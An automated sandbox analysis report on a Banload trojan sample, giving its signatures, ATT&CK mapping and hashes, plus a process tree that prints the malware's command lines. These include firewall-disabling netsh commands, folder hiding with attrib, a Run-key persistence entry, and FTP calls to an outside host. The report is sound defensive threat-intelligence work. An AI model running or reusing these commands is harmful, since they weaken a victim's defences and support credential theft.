banload | 7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60

Analysis

max time kernel
139s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27-08-2024 17:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Size

4.5MB
MD5

c56ba0ec71222ed7354dfaafec5cf766
SHA1

4922a8e60d98cb595d7e854355e9e78bb1894a61
SHA256

7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
SHA512

97492c5e70d7dc989e3f3a1e04a2e4afc23c5a69fbbfbb129cd2f830545fcb3bdbc5ecdb94adbb102c910d40e58564297311690a66fd945b0a497f1c02ce3d5e
SSDEEP

98304:Kke5WPFJWlki31xdKi+OTq9RvXODruQkckcE0VxTEJxvwPtQAfk6RwBvL0X:KWPFJob31gpeXuQkcNzVNUOHLwBj0X

Score

10^/10

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr01.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr02.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3136	netsh.exe
3200	netsh.exe
2248	netsh.exe
2260	netsh.exe

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2612	attrib.exe
4684	attrib.exe
3648	attrib.exe
4140	attrib.exe
920	attrib.exe
4352	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr02.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 8 IoCs

pid	Process
3940	Adobeta.exe
1064	adbr01.exe
4368	adbr01.exe
1760	adbr02.exe
4588	adbr02.exe
3776	Adobeta.exe
3460	Adobeta.exe
408	BReader.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023436-21.dat	upx
behavioral2/memory/3940-40-0x0000000000400000-0x000000000044C000-memory.dmp	upx
behavioral2/memory/3940-43-0x0000000000400000-0x000000000044C000-memory.dmp	upx
behavioral2/memory/3776-119-0x0000000000400000-0x000000000044C000-memory.dmp	upx
behavioral2/memory/3460-122-0x0000000000400000-0x000000000044C000-memory.dmp	upx

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	adbr02.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lodhgyuuuf = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4552	ipconfig.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment"	adbr01.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: 33	4368	adbr01.exe
Token: SeIncBasePriorityPrivilege	4368	adbr01.exe
Token: 33	4368	adbr01.exe
Token: SeIncBasePriorityPrivilege	4368	adbr01.exe
Token: SeDebugPrivilege	4368	adbr01.exe
Token: 33	4588	adbr02.exe
Token: SeIncBasePriorityPrivilege	4588	adbr02.exe
Token: 33	4588	adbr02.exe
Token: SeIncBasePriorityPrivilege	4588	adbr02.exe
Token: SeDebugPrivilege	4588	adbr02.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2596 wrote to memory of 1256	2596	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe	85
PID 2596 wrote to memory of 1256	2596	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe	85
PID 2596 wrote to memory of 1256	2596	c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe	85
PID 1256 wrote to memory of 1180	1256	WScript.exe	88
PID 1256 wrote to memory of 1180	1256	WScript.exe	88
PID 1256 wrote to memory of 1180	1256	WScript.exe	88
PID 1180 wrote to memory of 5088	1180	cmd.exe	95
PID 1180 wrote to memory of 5088	1180	cmd.exe	95
PID 1180 wrote to memory of 5088	1180	cmd.exe	95
PID 1180 wrote to memory of 4140	1180	cmd.exe	96
PID 1180 wrote to memory of 4140	1180	cmd.exe	96
PID 1180 wrote to memory of 4140	1180	cmd.exe	96
PID 1180 wrote to memory of 3648	1180	cmd.exe	97
PID 1180 wrote to memory of 3648	1180	cmd.exe	97
PID 1180 wrote to memory of 3648	1180	cmd.exe	97
PID 1180 wrote to memory of 920	1180	cmd.exe	98
PID 1180 wrote to memory of 920	1180	cmd.exe	98
PID 1180 wrote to memory of 920	1180	cmd.exe	98
PID 1180 wrote to memory of 4352	1180	cmd.exe	99
PID 1180 wrote to memory of 4352	1180	cmd.exe	99
PID 1180 wrote to memory of 4352	1180	cmd.exe	99
PID 1180 wrote to memory of 2612	1180	cmd.exe	100
PID 1180 wrote to memory of 2612	1180	cmd.exe	100
PID 1180 wrote to memory of 2612	1180	cmd.exe	100
PID 1180 wrote to memory of 4684	1180	cmd.exe	101
PID 1180 wrote to memory of 4684	1180	cmd.exe	101
PID 1180 wrote to memory of 4684	1180	cmd.exe	101
PID 1180 wrote to memory of 3496	1180	cmd.exe	102
PID 1180 wrote to memory of 3496	1180	cmd.exe	102
PID 1180 wrote to memory of 3496	1180	cmd.exe	102
PID 3496 wrote to memory of 2428	3496	WScript.exe	103
PID 3496 wrote to memory of 2428	3496	WScript.exe	103
PID 3496 wrote to memory of 2428	3496	WScript.exe	103
PID 2428 wrote to memory of 3940	2428	cmd.exe	105
PID 2428 wrote to memory of 3940	2428	cmd.exe	105
PID 2428 wrote to memory of 3940	2428	cmd.exe	105
PID 2428 wrote to memory of 5048	2428	cmd.exe	106
PID 2428 wrote to memory of 5048	2428	cmd.exe	106
PID 2428 wrote to memory of 5048	2428	cmd.exe	106
PID 2428 wrote to memory of 4552	2428	cmd.exe	107
PID 2428 wrote to memory of 4552	2428	cmd.exe	107
PID 2428 wrote to memory of 4552	2428	cmd.exe	107
PID 2428 wrote to memory of 1064	2428	cmd.exe	108
PID 2428 wrote to memory of 1064	2428	cmd.exe	108
PID 2428 wrote to memory of 1064	2428	cmd.exe	108
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109
PID 1064 wrote to memory of 4368	1064	adbr01.exe	109

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3648	attrib.exe
4140	attrib.exe
920	attrib.exe
4352	attrib.exe
2612	attrib.exe
4684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c56ba0ec71222ed7354dfaafec5cf766_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:5088
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4140
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3648
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:920
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4352
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2612
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4684
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2428
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
        
        Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3940
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:5048
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        6⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:4552
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1064
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1760
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2248
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2260
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3136
      - C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3200
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3776
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3460
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe
        
        BReader 5359
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\TEMP\RAIDTest

Filesize
4B

MD5
c2f09542b6c7daf4288f3524c8cebb18

SHA1
9430b21baf07f0d105b9ee5fdd9f868418454517

SHA256
55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4

SHA512
dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F86B0A0.TMP

Filesize
142B

MD5
84399b674a7da7acca7bd4d5562e0d31

SHA1
68d78af0cf71d50e6c510c70a0107a73a094c9b1

SHA256
535743fffe09450b19356638f0a80a8978054fb497ad479544ca3fab39d89957

SHA512
ffacffc2b208aadae8846417342fa49820abeff62c7a8a996f080befc87e7f06653692a766dd7ecb3dbb2b8719fd2a2e70ee183ba720501f89830827482759b9

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\011.011

Filesize
2KB

MD5
e1471d5f84084508bea441e81b08800d

SHA1
b4ad5b49e67e5f1020c3a6222b0f4d242f23c9df

SHA256
716b236ef4cb870d1312dc191bf0b0491a1f3e2cc835b4f063fcff0c4877821c

SHA512
a25fede07c6404f5e30417a2a2ad2843d9cd8fae31135c914c84585f02415dcc23831c6e248d0647212bb287bc29a836ff89685ddf5fcf02ed73b26bf4365ae3

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\112.112

Filesize
400B

MD5
51e38a852a05cc9718fa3f68041e9dad

SHA1
dd4bee5a01be174c3fda9904c61cfb2c41ede71c

SHA256
b6e9dcb02e18ec89d3e003c56fffab57b9afb032f89f5a7826b729311938b288

SHA512
197fb341edd0185948ff9739368ab0bea74012e87c9d27a67a665af50be2df7d6305b336e16cd1cec04dcca330dbbf6103d942ca9796030eb0b67fd331bea675

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr

Filesize
125B

MD5
2a48c0bef4fca10233a53f40feda48a5

SHA1
42e9c79e06fa255083f307c64c2e89cda323b026

SHA256
d7e97baf9575e2f20698fc0538a4003abbd4fba46389072088ed54a8d2629d13

SHA512
f4f009211f93b536ce52900e795cfdb2e40dbba94c70a1156c600c7a98caa9d58dcb19e5f81ad9845a0ea03650ff3bef1267ac02d11828484b8f35423811f7eb

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe

Filesize
128KB

MD5
f20a3059bc40437c8dac850095b076cc

SHA1
9b1d118b02ab9942e9fab659329b5556190b08a0

SHA256
5c75cc6d95f79d1d4a1c83b03500dbdc9d9b0b1dacdb61bbf28caf62da366c98

SHA512
d2a497929e8373fb7035601654e80ed05e73282d1a909429286e6afe18344819b3e173fc5fa4d12ef3deadb8d67000b245fb98e376e3fabc2544d0b1a693ee75

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe

Filesize
124KB

MD5
1a1075e5e307f3a4b8527110a51ce827

SHA1
f453838ed21020b7ca059244feea8579e5aa74ef

SHA256
ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

SHA512
b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs

Filesize
519B

MD5
d4773871db0e4b8cad180eab60250d3f

SHA1
5ce9259f9dea5985013c836c56ea6182a72c618a

SHA256
64681ae62fc11970f670e0d82efe4eb581cc0312d5c21b3082d7ac507543f3a6

SHA512
2b1ba8a8dc26ca4003cbe8e8d0920c571c5b39e5893bc1008d5a34bbbe4922812c2c8048df76ad28fa153bcaa236e890829c59596360494082dcf2a9ee9bac45

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght

Filesize
2.4MB

MD5
4d432bd0929e1fad42c98584dda0b9f5

SHA1
c3381e2205b1e3493e28528cc3f18798c3ba5223

SHA256
ffadb8953d9f92020fb9bb1d31d58aa73383ba83f8b8e762802048db2171e58c

SHA512
bc5d8b1f6f1be46e91ca868320fde9fd0d9311710183e052adc7d112ec5ef42efd222d38dfea7e7292a882254ad5ff0f0dd6a6f0d6b7c8f957a23140111b9750

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght

Filesize
2.2MB

MD5
a754735e5ac70d33fd528b079e503ff9

SHA1
d8a0069a07e9b6bd4f07eae04de331cd60f85eb8

SHA256
86f299063483f6134e634d6b356eb38a8e6a779cd0f3d495d49683c0cc9e8e24

SHA512
fed49537700f73abbb4cf7716d03c28010f5f69d280dc188c44c1826927f1ed247238d0983267b037a3b22a69c8668c27d3ccaa0618e303c8d930f4ccc281d9d

Download Submit
C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat

Filesize
205B

MD5
426de1728c46d6b08f9ad56cf08ab872

SHA1
215e41275f0a1204b3c896f7efbc49700b353950

SHA256
bad31ec72d26efc643a53a2a838e14f179d3242cd6e4f85a16a0b95b17015684

SHA512
9a7131b6edb1e5c2deaafd3286077af939c0abaa7a83bbd19f85de52e56a0dabd9d657281ccc026553ee8e12a6fa49fd8b95a3bcc83bb7a84b48588f25b74a4e

Download Submit
